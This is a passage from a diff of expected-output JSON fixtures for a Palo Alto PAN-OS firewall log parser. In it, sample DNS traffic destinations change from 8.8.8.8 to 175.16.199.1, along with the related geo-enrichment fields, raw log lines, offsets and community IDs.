         "client.nat.port": 3675,
         "client.packets": 1,
         "client.port": 6185,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 169,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 1,
         "destination.port": 53,
@@ -7204,7 +7012,7 @@
         "event.end": "2018-11-30T16:09:14.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24211,1,6185,53,3675,53,0x400019,udp,allow,240,71,169,2,2018/11/30 16:09:14,0,any,0,32091177,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+        "event.original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24211,1,6185,53,3675,53,0x400019,udp,allow,240,71,169,2,2018/11/30 16:09:14,0,any,0,32091177,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
         "event.outcome": "success",
         "event.start": "2018-11-30T16:09:14.000-02:00",
         "event.timezone": "-02:00",
@@ -7216,12 +7024,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 30245,
+        "log.offset": 30615,
         "network.application": "dns",
         "network.bytes": 240,
         "network.community_id": [
-            "1:LJ6ZkdUI9SYHDvi3B2Yn/9ILMbM=",
-            "1:p8DU1xLXG63f/3s/r6ZKJcQo9u8="
+            "1:TgKht4IY3bXV7bhl2uE8yxyTVxc=",
+            "1:YkPur+uarfYMTJuYRe5QYRrH/es="
         ],
         "network.direction": "outbound",
         "network.packets": 2,
@@ -7238,12 +7046,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "untrust",
         "panw.panos.endreason": "aged-out",
         "panw.panos.flow_id": "24211",
-        "panw.panos.network.nat.community_id": "1:p8DU1xLXG63f/3s/r6ZKJcQo9u8=",
+        "panw.panos.network.nat.community_id": "1:TgKht4IY3bXV7bhl2uE8yxyTVxc=",
         "panw.panos.ruleset": "new_outbound_from_trust",
         "panw.panos.sequence_number": 32091177,
         "panw.panos.source.interface": "ethernet1/2",
@@ -7258,14 +7066,14 @@
             "PA-220"
         ],
         "related.ip": [
+            "175.16.199.1",
             "192.168.1.63",
-            "192.168.15.224",
-            "8.8.8.8"
+            "192.168.15.224"
         ],
         "rule.name": "new_outbound_from_trust",
         "server.bytes": 169,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 1,
         "server.port": 53,
@@ -7290,17 +7098,18 @@
         "client.nat.port": 5787,
         "client.packets": 1,
         "client.port": 8781,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 128,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 1,
         "destination.port": 53,
@@ -7314,7 +7123,7 @@
         "event.end": "2018-11-30T16:09:14.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24253,1,8781,53,5787,53,0x400019,udp,allow,208,80,128,2,2018/11/30 16:09:14,0,any,0,32091178,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+        "event.original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24253,1,8781,53,5787,53,0x400019,udp,allow,208,80,128,2,2018/11/30 16:09:14,0,any,0,32091178,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
         "event.outcome": "success",
         "event.start": "2018-11-30T16:09:14.000-02:00",
         "event.timezone": "-02:00",
@@ -7326,12 +7135,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 30692,
+        "log.offset": 31072,
         "network.application": "dns",
         "network.bytes": 208,
         "network.community_id": [
-            "1:8CDWB7X3kkKjoV2bprSLSQY1py4=",
-            "1:bU3nBIz+M3cDoPKg8azcJgVx+8Q="
+            "1:4kMe7BSg1jmAu9marx8zCErWXnE=",
+            "1:IG1vmXIXr9XMoOn0ZR3Jpjzb/GQ="
         ],
         "network.direction": "outbound",
         "network.packets": 2,
@@ -7348,12 +7157,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "untrust",
         "panw.panos.endreason": "aged-out",
         "panw.panos.flow_id": "24253",
-        "panw.panos.network.nat.community_id": "1:bU3nBIz+M3cDoPKg8azcJgVx+8Q=",
+        "panw.panos.network.nat.community_id": "1:4kMe7BSg1jmAu9marx8zCErWXnE=",
         "panw.panos.ruleset": "new_outbound_from_trust",
         "panw.panos.sequence_number": 32091178,
         "panw.panos.source.interface": "ethernet1/2",
@@ -7368,14 +7177,14 @@
             "PA-220"
         ],
         "related.ip": [
+            "175.16.199.1",
             "192.168.1.63",
-            "192.168.15.224",
-            "8.8.8.8"
+            "192.168.15.224"
         ],
         "rule.name": "new_outbound_from_trust",
         "server.bytes": 128,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 1,
         "server.port": 53,
@@ -7400,17 +7209,18 @@
         "client.nat.port": 12342,
         "client.packets": 1,
         "client.port": 16788,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 181,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 1,
         "destination.port": 53,
@@ -7424,7 +7234,7 @@
         "event.end": "2018-11-30T16:09:14.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24221,1,16788,53,12342,53,0x400019,udp,allow,253,72,181,2,2018/11/30 16:09:14,0,any,0,32091179,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+        "event.original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24221,1,16788,53,12342,53,0x400019,udp,allow,253,72,181,2,2018/11/30 16:09:14,0,any,0,32091179,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
         "event.outcome": "success",
         "event.start": "2018-11-30T16:09:14.000-02:00",
         "event.timezone": "-02:00",
@@ -7436,12 +7246,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 31139,
+        "log.offset": 31529,
         "network.application": "dns",
         "network.bytes": 253,
         "network.community_id": [
-            "1:ScmRIn+bxqoJafQfJfEaH/CdCjE=",
-            "1:vnb4ttnFy2i39tg89p3jkGs6eDg="
+            "1:NpUjkT7dIbMpW4JcNZFZad7+YTk=",
+            "1:g2w1ngDHewEU39cV0kn/LLmYUbE="
         ],
         "network.direction": "outbound",
         "network.packets": 2,
@@ -7458,12 +7268,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "untrust",
         "panw.panos.endreason": "aged-out",
         "panw.panos.flow_id": "24221",
-        "panw.panos.network.nat.community_id": "1:vnb4ttnFy2i39tg89p3jkGs6eDg=",
+        "panw.panos.network.nat.community_id": "1:NpUjkT7dIbMpW4JcNZFZad7+YTk=",
         "panw.panos.ruleset": "new_outbound_from_trust",
         "panw.panos.sequence_number": 32091179,
         "panw.panos.source.interface": "ethernet1/2",
@@ -7478,14 +7288,14 @@
             "PA-220"
         ],
         "related.ip": [
+            "175.16.199.1",
             "192.168.1.63",
-            "192.168.15.224",
-            "8.8.8.8"
+            "192.168.15.224"
         ],
         "rule.name": "new_outbound_from_trust",
         "server.bytes": 181,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 1,
         "server.port": 53,
@@ -7510,17 +7320,18 @@
         "client.nat.port": 18729,
         "client.packets": 1,
         "client.port": 45307,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 121,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 1,
         "destination.port": 53,
@@ -7534,7 +7345,7 @@
         "event.end": "2018-11-30T16:09:14.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24310,1,45307,53,18729,53,0x400019,udp,allow,197,76,121,2,2018/11/30 16:09:14,0,any,0,32091180,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+        "event.original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24310,1,45307,53,18729,53,0x400019,udp,allow,197,76,121,2,2018/11/30 16:09:14,0,any,0,32091180,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
         "event.outcome": "success",
         "event.start": "2018-11-30T16:09:14.000-02:00",
         "event.timezone": "-02:00",
@@ -7546,12 +7357,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 31588,
+        "log.offset": 31988,
         "network.application": "dns",
         "network.bytes": 197,
         "network.community_id": [
-            "1:71/qcXOmOV3sXCqZ1T6JVPlE9y8=",
-            "1:eupsSNkv67+oInX/FQ2hHpUMyR8="
+            "1:qSvFitPk6ZvC6N3gLeZpuL1qqCE=",
+            "1:yzXWvS3fpaPzwrvGsYmztnc8QW0="
         ],
         "network.direction": "outbound",
         "network.packets": 2,
@@ -7568,12 +7379,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "untrust",
         "panw.panos.endreason": "aged-out",
         "panw.panos.flow_id": "24310",
-        "panw.panos.network.nat.community_id": "1:71/qcXOmOV3sXCqZ1T6JVPlE9y8=",
+        "panw.panos.network.nat.community_id": "1:qSvFitPk6ZvC6N3gLeZpuL1qqCE=",
         "panw.panos.ruleset": "new_outbound_from_trust",
         "panw.panos.sequence_number": 32091180,
         "panw.panos.source.interface": "ethernet1/2",
@@ -7588,14 +7399,14 @@
             "PA-220"
         ],
         "related.ip": [
+            "175.16.199.1",
             "192.168.1.63",
-            "192.168.15.224",
-            "8.8.8.8"
+            "192.168.15.224"
         ],
         "rule.name": "new_outbound_from_trust",
         "server.bytes": 121,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 1,
         "server.port": 53,
@@ -7621,17 +7432,9 @@
         "client.packets": 6,
         "client.port": 52520,
         "destination.address": "23.52.174.25",
-        "destination.as.number": 20940,
-        "destination.as.organization.name": "Akamai International B.V.",
+        "destination.as.number": 35994,
+        "destination.as.organization.name": "Akamai Technologies, Inc.",
         "destination.bytes": 1246,
-        "destination.geo.city_name": "San Antonio",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 29.4551,
-        "destination.geo.location.lon": -98.6498,
-        "destination.geo.region_iso_code": "US-TX",
-        "destination.geo.region_name": "Texas",
         "destination.ip": "23.52.174.25",
         "destination.nat.ip": "23.52.174.25",
         "destination.nat.port": 80,
@@ -7659,7 +7462,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 32037,
+        "log.offset": 32447,
         "network.application": "ocsp",
         "network.bytes": 1927,
         "network.community_id": [
@@ -7733,17 +7536,18 @@
         "client.nat.port": 2722,
         "client.packets": 1,
         "client.port": 8503,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 315,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 1,
         "destination.port": 53,
@@ -7757,7 +7561,7 @@
         "event.end": "2018-11-30T16:09:14.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24201,1,8503,53,2722,53,0x400019,udp,allow,394,79,315,2,2018/11/30 16:09:13,1,any,0,32091182,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+        "event.original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24201,1,8503,53,2722,53,0x400019,udp,allow,394,79,315,2,2018/11/30 16:09:13,1,any,0,32091182,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
         "event.outcome": "success",
         "event.start": "2018-11-30T16:09:13.000-02:00",
         "event.timezone": "-02:00",
@@ -7769,12 +7573,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 32523,
+        "log.offset": 32933,
         "network.application": "dns",
         "network.bytes": 394,
         "network.community_id": [
-            "1:5CL0nRdjk2Nab0PzB6vfyC1FbtI=",
-            "1:hxrz+dYE5XEf60JMlFz6JKWD6Ek="
+            "1:+dAjIg3ed8rxAdZqVmInBcFaH1Y=",
+            "1:WVlFLy1ZPgggGkD86Ln70kG53+s="
         ],
         "network.direction": "outbound",
         "network.packets": 2,
@@ -7791,12 +7595,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "untrust",
         "panw.panos.endreason": "aged-out",
         "panw.panos.flow_id": "24201",
-        "panw.panos.network.nat.community_id": "1:hxrz+dYE5XEf60JMlFz6JKWD6Ek=",
+        "panw.panos.network.nat.community_id": "1:+dAjIg3ed8rxAdZqVmInBcFaH1Y=",
         "panw.panos.ruleset": "new_outbound_from_trust",
         "panw.panos.sequence_number": 32091182,
         "panw.panos.source.interface": "ethernet1/2",
@@ -7811,14 +7615,14 @@
             "PA-220"
         ],
         "related.ip": [
+            "175.16.199.1",
             "192.168.1.63",
-            "192.168.15.224",
-            "8.8.8.8"
+            "192.168.15.224"
         ],
         "rule.name": "new_outbound_from_trust",
         "server.bytes": 315,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 1,
         "server.port": 53,
@@ -7843,17 +7647,18 @@
         "client.nat.port": 6674,
         "client.packets": 1,
         "client.port": 6910,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 130,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 1,
         "destination.port": 53,
@@ -7867,7 +7672,7 @@
         "event.end": "2018-11-30T16:09:14.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24130,1,6910,53,6674,53,0x400019,udp,allow,212,82,130,2,2018/11/30 16:09:14,0,any,0,32091183,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+        "event.original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24130,1,6910,53,6674,53,0x400019,udp,allow,212,82,130,2,2018/11/30 16:09:14,0,any,0,32091183,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
         "event.outcome": "success",
         "event.start": "2018-11-30T16:09:14.000-02:00",
         "event.timezone": "-02:00",
@@ -7879,12 +7684,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 32970,
+        "log.offset": 33390,
         "network.application": "dns",
         "network.bytes": 212,
         "network.community_id": [
-            "1:3cIrQ2yt0QUupDVmbBJXH54+2pA=",
-            "1:8cb9oPS9OJnzqGAkowgmRpiqmJU="
+            "1:DdftFWHUV6zFdIItu/clDOeJp2w=",
+            "1:cEWHWAc2Xquu42JBj+eNL8udND0="
         ],
         "network.direction": "outbound",
         "network.packets": 2,
@@ -7901,12 +7706,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "untrust",
         "panw.panos.endreason": "aged-out",
         "panw.panos.flow_id": "24130",
-        "panw.panos.network.nat.community_id": "1:8cb9oPS9OJnzqGAkowgmRpiqmJU=",
+        "panw.panos.network.nat.community_id": "1:cEWHWAc2Xquu42JBj+eNL8udND0=",
         "panw.panos.ruleset": "new_outbound_from_trust",
         "panw.panos.sequence_number": 32091183,
         "panw.panos.source.interface": "ethernet1/2",
@@ -7921,14 +7726,14 @@
             "PA-220"
         ],
         "related.ip": [
+            "175.16.199.1",
             "192.168.1.63",
-            "192.168.15.224",
-            "8.8.8.8"
+            "192.168.15.224"
         ],
         "rule.name": "new_outbound_from_trust",
         "server.bytes": 130,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 1,
         "server.port": 53,
@@ -7954,17 +7759,7 @@
         "client.packets": 5,
         "client.port": 52475,
         "destination.address": "54.230.5.228",
-        "destination.as.number": 16509,
-        "destination.as.organization.name": "Amazon.com, Inc.",
         "destination.bytes": 288,
-        "destination.geo.city_name": "Seattle",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 47.54,
-        "destination.geo.location.lon": -122.3032,
-        "destination.geo.region_iso_code": "US-WA",
-        "destination.geo.region_name": "Washington",
         "destination.ip": "54.230.5.228",
         "destination.nat.ip": "54.230.5.228",
         "destination.nat.port": 443,
@@ -7992,7 +7787,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 33417,
+        "log.offset": 33847,
         "network.application": "incomplete",
         "network.bytes": 642,
         "network.community_id": [
@@ -8066,17 +7861,18 @@
         "client.nat.port": 22408,
         "client.packets": 1,
         "client.port": 14342,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 149,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 1,
         "destination.port": 53,
@@ -8090,7 +7886,7 @@
         "event.end": "2018-11-30T16:09:14.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24108,1,14342,53,22408,53,0x400019,udp,allow,225,76,149,2,2018/11/30 16:09:14,0,any,0,32091185,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+        "event.original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24108,1,14342,53,22408,53,0x400019,udp,allow,225,76,149,2,2018/11/30 16:09:14,0,any,0,32091185,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
         "event.outcome": "success",
         "event.start": "2018-11-30T16:09:14.000-02:00",
         "event.timezone": "-02:00",
